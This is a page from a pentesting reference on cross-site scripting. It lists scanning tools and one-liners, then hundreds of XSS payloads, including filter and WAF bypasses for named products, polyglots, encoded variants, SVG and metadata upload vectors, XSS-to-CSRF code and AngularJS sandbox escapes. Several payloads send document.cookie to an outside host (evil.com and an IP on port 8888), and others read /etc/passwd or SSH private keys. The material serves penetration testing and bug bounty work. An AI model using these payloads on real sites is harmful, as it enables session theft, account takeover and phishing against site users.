Pentest Book
Search…
XSS
Cross-Site Scripting (XSS) Cheat Sheet - 2021 Edition | Web Security Academy
WebSecAcademy
Try XSS in every input field, host headers, url redirections, URI paramenters and file upload namefiles.
Actions: phising through iframe, cookie stealing, always try convert self to reflected.

Tools

1
# https://github.com/hahwul/dalfox
2
dalfox url http://testphp.vulnweb.com/listproducts.php
3
4
# https://github.com/KathanP19/Gxss
5
# Replace every param value with word FUZZ
6
echo "https://target.com/some.php?first=hello&last=world" | Gxss -c 100
7
8
# XSpear
9
gem install XSpear
10
XSpear -u 'https://web.com' -a
11
XSpear -u 'https://www.web.com/?q=123' --cookie='role=admin' -v 1 -a -b https://six2dez.xss.ht -t 20
12
XSpear -u "http://testphp.vulnweb.com/search.php?test=query" -p test -v 1
13
14
# Xira
15
# https://github.com/xadhrit/xira
16
python3 xira.py -u url
17
18
# Hosting XSS
19
# surge.sh
20
npm install --global surge
21
mkdir mypayload
22
cd mypayload
23
echo "alert(1)" > payload.js
24
surge # It returns the url
25
26
# XSS vectors
27
https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45
28
29
# Payload list
30
https://github.com/m0chan/BugBounty/blob/master/xss-payload-list.txt
31
32
https://github.com/terjanq/Tiny-XSS-Payloads
33
34
# XSS to RCE
35
# https://github.com/shelld3v/JSshell
36
37
# Polyglots
38
# https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
39
40
# XSS browser
41
# https://github.com/RenwaX23/XSSTRON
42
43
# Blind
44
# https://github.com/hipotermia/vaya-ciego-nen
Copied!

Oneliners

1
# WaybackUrls
2
echo "domain.com" | waybackurls | httpx -silent | Gxss -c 100 -p Xss | sort -u | dalfox pipe -b https://six2dez.xss.ht
3
# Param discovery based
4
paramspider -d target.com > /filepath/param.txt && dalfox -b https://six2dez.xss.ht file /filepath/param.txt
5
# Blind XSS
6
cat target_list.txt | waybackurls -no-subs | grep "https://" | grep -v "png\|jpg\|css\|js\|gif\|txt" | grep "=" | qsreplace -a | dalfox pipe -b https://six2dez.xss.ht
7
# Reflected XSS
8
echo "domain.com" | waybackurls | gf xss | kxss
Copied!

XSS recopilation

Basics

1
# Locators
2
'';!--"<XSS>=&{()}
3
4
# 101
5
<script>alert(1)</script>
6
<script>+-+-1-+-+alert(1)</script>
7
<script>+-+-1-+-+alert(/xss/)</script>
8
%3Cscript%3Ealert(0)%3C%2Fscript%3E
9
%253Cscript%253Ealert(0)%253C%252Fscript%253E
10
<svg onload=alert(1)>
11
"><svg onload=alert(1)>
12
<iframe src="javascript:alert(1)">
13
"><script src=data:&comma;alert(1)//
14
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
15
%5B'-alert(document.cookie)-'%5D
Copied!

By tag

1
# Tag filter bypass
2
<svg/onload=alert(1)>
3
<script>alert(1)</script>
4
<script >alert(1)</script>
5
<ScRipT>alert(1)</sCriPt>
6
<%00script>alert(1)</script>
7
<script>al%00ert(1)</script>
8
9
# HTML tags
10
<img/src=x a='' onerror=alert(1)>
11
<IMG """><SCRIPT>alert(1)</SCRIPT>">
12
<img src=`x`onerror=alert(1)>
13
<img src='/' onerror='alert("kalisa")'>
14
<IMG SRC=# onmouseover="alert('xxs')">
15
<IMG SRC= onmouseover="alert('xxs')">
16
<IMG onmouseover="alert('xxs')">
17
<BODY ONLOAD=alert('XSS')>
18
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
19
<SCRIPT SRC=http:/evil.com/xss.js?< B >
20
"><XSS<test accesskey=x onclick=alert(1)//test
21
<svg><discard onbegin=alert(1)>
22
<script>image = new Image(); image.src="https://evil.com/?c="+document.cookie;</script>
23
<script>image = new Image(); image.src="http://"+document.cookie+"evil.com/";</script>
24
25
# Other tags
26
<BASE HREF="javascript:alert('XSS');//">
27
<DIV STYLE="width: expression(alert('XSS'));">
28
<TABLE BACKGROUND="javascript:alert('XSS')">
29
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
30
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
31
<xss id=x tabindex=1 onactivate=alert(1)></xss>
32
<xss onclick="alert(1)">test</xss>
33
<xss onmousedown="alert(1)">test</xss>
34
<body onresize=alert(1)>”onload=this.style.width=‘100px’>
35
<xss id=x onfocus=alert(document.cookie)tabindex=1>#x’;</script>
36
37
# CharCode
38
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
39
40
# Input already in script tag
41
@domain.com">user+'-alert`1`-'@domain.com
42
43
# Scriptless
44
<link rel=icon href="//evil?
45
<iframe src="//evil?
46
<iframe src="//evil?
47
<input type=hidden type=image src="//evil?
48
49
# Unclosed Tags
50
<svg onload=alert(1)//
Copied!

Blind

1
# Blind XSS
2
# https://github.com/LewisArdern/bXSS
3
# https://github.com/ssl/ezXSS
4
# https://xsshunter.com/
5
6
# Blind XSS detection
7
# Xsshunter payload in every field
8
# Review forms
9
# Contact Us pages
10
# Passwords(You never know if the other side doesn’t properly handle input and if your password is in View mode)
11
# Address fields of e-commerce sites
12
# First or Last Name field while doing Credit Card Payments
13
# Set User-Agent to a Blind XSS payload. You can do that easily from a proxy such as Burpsuite.
14
# Log Viewers
15
# Feedback Page
16
# Chat Applications
17
# Any app that requires user moderation
18
# Host header
19
# Why cancel subscription? forms
Copied!

Bypasses

1
# No parentheses
2
<script>onerror=alert;throw 1</script>
3
<script>throw onerror=eval,'=alert\x281\x29'</script>
4
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
5
<script>location='javascript:alert\x281\x29'</script>
6
<script>alert`1`</script>
7
<script>new Function`X${document.location.hash.substr`1`}`</script>
8
9
# No parentheses and no semicolons
10
<script>{onerror=alert}throw 1</script>
11
<script>throw onerror=alert,1</script>
12
<script>onerror=alert;throw 1337</script>
13
<script>{onerror=alert}throw 1337</script>
14
<script>throw onerror=alert,'some string',123,'haha'</script>
15
16
# No parentheses and no spaces:
17
<script>Function`X${document.location.hash.substr`1`}```</script>
18
19
# Angle brackets HTML encoded (in an attribute)
20
“onmouseover=“alert(1)
21
‘-alert(1)-’
22
23
# If quote is escaped
24
‘}alert(1);{‘
25
‘}alert(1)%0A{‘
26
\’}alert(1);{//
27
28
# Embedded tab, newline, carriage return to break up XSS
29
<IMG SRC="jav&#x09;ascript:alert('XSS');">
30
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
31
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
32
33
# RegEx bypass
34
<img src="X" onerror=top[8680439..toString(30)](1337)>
35
36
# Other
37
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>: base64 value which is alert(‘XSS’)
Copied!

Encoded

1
# Unicode
2
<script>\u0061lert(1)</script>
3
<script>\u{61}lert(1)</script>
4
<script>\u{0000000061}lert(1)</script>
5
6
# Hex
7
<script>eval('\x61lert(1)')</script>
8
9
# HTML
10
<svg><script>&#97;lert(1)</script></svg>
11
<svg><script>&#x61;lert(1)</script></svg>
12
<svg><script>alert&NewLine;(1)</script></svg>
13
<svg><script>x="&quot;,alert(1)//";</script></svg>
14
\’-alert(1)//
15
16
# URL
17
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
18
19
# Double URL Encode
20
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
21
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
22
23
# Unicode + HTML
24
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
25
26
# HTML + URL
27
<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
Copied!

Polyglots

1
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
2
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
3
oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e
4
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(document.domain)//'>
5
javascript:alert();//<img src=x:x onerror=alert(1)>\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!--
6
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
7
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
8
```
9
%3C!%27/!%22/!\%27/\%22/ — !%3E%3C/Title/%3C/script/%3E%3CInput%20Type=Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm1%20//%3E#
10
<!'/!”/!\'/\"/ — !></Title/</script/><Input Type=Text Style=position:fixed;top:0;left:0;font-size:999px */; Onmouseenter=confirm1 //>#
11
jaVasCript:/-//*\/'/"/*/(/ */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
12
">>
13
” ></plaintext></|><plaintext/onmouseover=prompt(1) >prompt(1)@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →” > "></script>alert(1)”><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">">
14
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
15
?msg=<img/src=`%00`%20onerror=this.onerror=confirm(1)
16
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
17
<sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”> <iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>
18
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
19
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
20
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouse over=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><imgsrc="http://i.imgur.com/P8mL8.jpg">
21
22
# No parenthesis, back ticks, brackets, quotes, braces
23
a=1337,b=confirm,c=window,c.onerror=b;throw-a
24
25
# Another uncommon
26
'-(a=alert,b="_Y000!_",[b].find(a))-'
27
28
# Common XSS in HTML Injection
29
<svg onload=alert(1)>
30
</tag><svg onload=alert(1)>
31
"></tag><svg onload=alert(1)>
32
'onload=alert(1)><svg/1='
33
'>alert(1)</script><script/1='
34
*/alert(1)</script><script>/*
35
*/alert(1)">'onload="/*<svg/1='
36
`-alert(1)">'onload="`<svg/1='
37
*/</script>'>alert(1)/*<script/1='
38
p=<svg/1='&q='onload=alert(1)>
39
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
40
q=<script/&q=/src=data:&q=alert(1)>
41
<script src=data:,alert(1)>
42
# inline
43
"onmouseover=alert(1) //
44
"autofocus onfocus=alert(1) //
45
# src attribute
46
javascript:alert(1)
47
# JS injection
48
'-alert(1)-'
49
'/alert(1)//
50
\'/alert(1)//
51
'}alert(1);{'
52
'}alert(1)%0A{'
53
\'}alert(1);{//
54
/alert(1)//\
55
/alert(1)}//\
56
${alert(1)}
57
58
# XSS onscroll
59
<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y
60
61
# XSS filter bypasss polyglot:
62
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
63
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
64
65
" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>
66
" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script>
67
68
# GO SSTI
69
{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}`
70
71
# Some XSS exploitations
72
- host header injection through xss
73
add referer: batman
74
hostheader: bing.com">script>alert(document.domain)</script><"
75
- URL redirection through xss
76
document.location.href="http://evil.com"
77
- phishing through xss - iframe injection
78
<iframe src="http://evil.com" height="100" width="100"></iframe>
79
- Cookie stealing through xss
80
https://github.com/lnxg33k/misc/blob/master/XSS-cookie-stealer.py
81
https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md
82
<script>var i=new Image;i.src="http://172.30.5.46:8888/?"+document.cookie;</script>
83
<img src=x onerror=this.src='http://172.30.5.46:8888/?'+document.cookie;>
84
<img src=x onerror="this.src='http://172.30.5.46:8888/?'+document.cookie; this.removeAttribute('onerror');">
85
- file upload through xss
86
upload a picturefile, intercept it, change picturename.jpg to xss paylaod using intruder attack
87
- remote file inclusion (RFI) through xss
88
php?=http://brutelogic.com.br/poc.svg - xsspayload
89
- convert self xss to reflected one
90
copy response in a file.html -> it will work
91
92
# XSS to SSRF
93
<esi:include src="http://yoursite.com/capture" />
94
95
# XSS to LFI
96
<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send();</script>
97
98
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
99
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</scrip>
Copied!

XSS in files

1
# XSS in filename:
2
"><img src=x onerror=alert(document.domain)>.gif
3
4
# XSS in metadata:
5
exiftool -FIELD=XSS FILE
6
exiftool -Artist=' "><img src=1 onerror=alert(document.domain)>' brute.jpeg
7
exiftool -Artist='"><script>alert(1)</script>' dapos.jpeg
8
9
# XSS in GIF Magic Number:
10
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
11
# If image can't load:
12
url.com/test.php?p=<script src=http://url.com/upload/img/xss.gif>
13
14
# XSS in png:
15
https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/
16
17
# XSS in PDF:
18
https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html?m=1
19
20
# XSS upload filename:
21
cp somefile.txt \"\>\<img\ src\ onerror=prompt\(1\)\>
22
<img src=x onerror=alert('XSS')>.png
23
"><img src=x onerror=alert('XSS')>.png
24
"><svg onmouseover=alert(1)>.svg
25
<<script>alert('xss')<!--a-->a.png
26
"><svg onload=alert(1)>.gif
27
28
# XSS Svg Image upload
29
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
30
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
31
<script type="text/javascript">
32
alert('XSS!');
33
</script>
34
</svg>
35
36
# XSS svg image upload 2
37
# If you're testing a text editor on a system that you can also upload files to, try to embed an svg:
38
<iframe src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/movingcart_1.svg" frameborder="0"></iframe>
39
#If that works, upload an SVG with the following content and try rendering it using the text editor:
40
<svg xmlns="http://www.w3.org/2000/svg">
41
<script>alert(document.domain)</script>
42
</svg>
43
44
# XSS in SVG 3:
45
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
46
47
# XSS in XML
48
<html>
49
<head></head>
50
<body>
51
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
52
</body>
53
</html>
54
55
# https://brutelogic.com.br/blog/file-upload-xss/
56
57
" ="" '></><script></script><svg onload"="alertonload=alert(1)"" onload=setInterval'alert\x28document.domain\x29'
58
59
# XSS in existent jpeg:
60
exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
61
62
# XSS in url (and put as header)
63
http://acme.corp/?redir=[URI_SCHEME]://gremwell.com%0A%0A[XSS_PAYLOAD]
64
65
# XSS in XML
66
<?xml version="1.0" encoding="UTF-8"?>
67
<html xmlns:html="http://w3.org/1999/xhtml">
68
<html:script>prompt(document.domain);</html:script>
69
</html>
Copied!

DOM XSS

1
<img src=1 onerror=alert(1)>
2
<iframe src=javascript:alert(1)>
3
<details open ontoggle=alert(1)>
4
<svg><svg onload=alert(1)>
5
data:text/html,<img src=1 onerror=alert(1)>
6
data:text/html,<iframe src=javascript:alert(1)>
7
<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
8
"><svg onload=alert(1)>
9
javascript:alert(document.cookie)
10
\"-alert(1)}//
Copied!

XSS to CSRF

1
# Example:
2
3
# Detect action to change email, with anti csrf token, get it and paste this in a comment to change user email:
4
5
<script>
6
var req = new XMLHttpRequest();
7
req.onload = handleResponse;
8
req.open('get','/email',true);
9
req.send();
10
function handleResponse() {
11
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
12
var changeReq = new XMLHttpRequest();
13
changeReq.open('post', '/email/change-email', true);
14
changeReq.send('csrf='+token+'&[email protected]')
15
};
16
</script>
Copied!

AngularJS Sandbox

1
# Removed in AngularJS 1.6
2
# Is a way to avoid some strings like window, document or __proto__.
3
4
# Without strings:
5
/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
6
7
# With CSP:
8
9
<script>
10
location='https://your-lab-id.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
11
</script>
12
13
# v 1.6 and up
14
{{$new.constructor('alert(1)')()}}
15
<x ng-app>{{$new.constructor('alert(1)')()}}
16
17
{{constructor.constructor('alert(1)')()}}
18
{{constructor.constructor('import("https://six2dez.xss.ht")')()}}
19
{{$on.constructor('alert(1)')()}}
20
{{{}.")));alert(1)//"}}
21
{{{}.")));alert(1)//"}}
22
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,11 4,116,40,49,41)
Copied!

XSS in JS

1
# Inside JS script:
2
</script><img src=1 onerror=alert(document.domain)>
3
</script><script>alert(1)</script>
4
5
# Inside JS literal script:
6
'-alert(document.domain)-'
7
';alert(document.domain)//
8
'-alert(1)-'
9
10
# Inside JS that escape special chars:
11
If ';alert(document.domain)// is converted in \';alert(document.domain)//
12
Use \';alert(document.domain)// to obtain \\';alert(document.domain)//
13
\'-alert(1)//
14
15
# Inside JS with some char blocked:
16
onerror=alert;throw 1
17
/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27
18
19
# Inside {}
20
${alert(document.domain)}
21
${alert(1)}
Copied!

XSS Waf Bypasses

1
# Only lowercase block
2
<sCRipT>alert(1)</sCRipT>
3
4
# Break regex
5
<script>%0aalert(1)</script>
6
7
# Double encoding
8
%2522
9
10
# Recursive filters
11
<scr<script>ipt>alert(1)</scr</script>ipt>
12
13
# Inject anchor tag
14
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
15
16
# Bypass whitespaces
17
<svg·onload=alert(1)>
18
19
# Change GET to POST request
20
21
# Imperva Incapsula
22
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%25 26%2523x29%3B%22%3E
23
<img/src="x"/onerror="[JS-F**K Payload]">
24
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';><img/src=q onerror='new Function`al\ert\`1\``'>
25
26
# WebKnight
27
<details ontoggle=alert(1)>
28
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
29
30
# F5 Big IP
31
<body style="height:1000px" onwheel="[DATA]">
32
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
33
<body style="height:1000px" onwheel="[JS-F**k Payload]">
34
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JS-F**k Payload]">
35
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
36
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
37
38
# Barracuda WAF
39
<body style="height:1000px" onwheel="alert(1)">
40
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
41
42
# PHP-IDS
43
<svg+onload=+"[DATA]"
44
<svg+onload=+"aler%25%37%34(1)"
45
46
# Mod-Security
47
<a href="j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);">XSS</a>
48
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
49
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
50
51
# Quick Defense:
52
<input type="search" onsearch="aler\u0074(1)">
53
<details ontoggle="aler\u0074(1)">
54
55
# Sucuri WAF
56
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
57
58
# Akamai
59
1%3C/script%3E%3Csvg/onload=prompt(document[domain])%3E
60
<SCr%00Ipt>confirm(1)</scR%00ipt>
61
# AngularJS
62
{{constructor.constructor(alert 1 )()}}
Copied!

XSS Mindmap

Last modified 4mo ago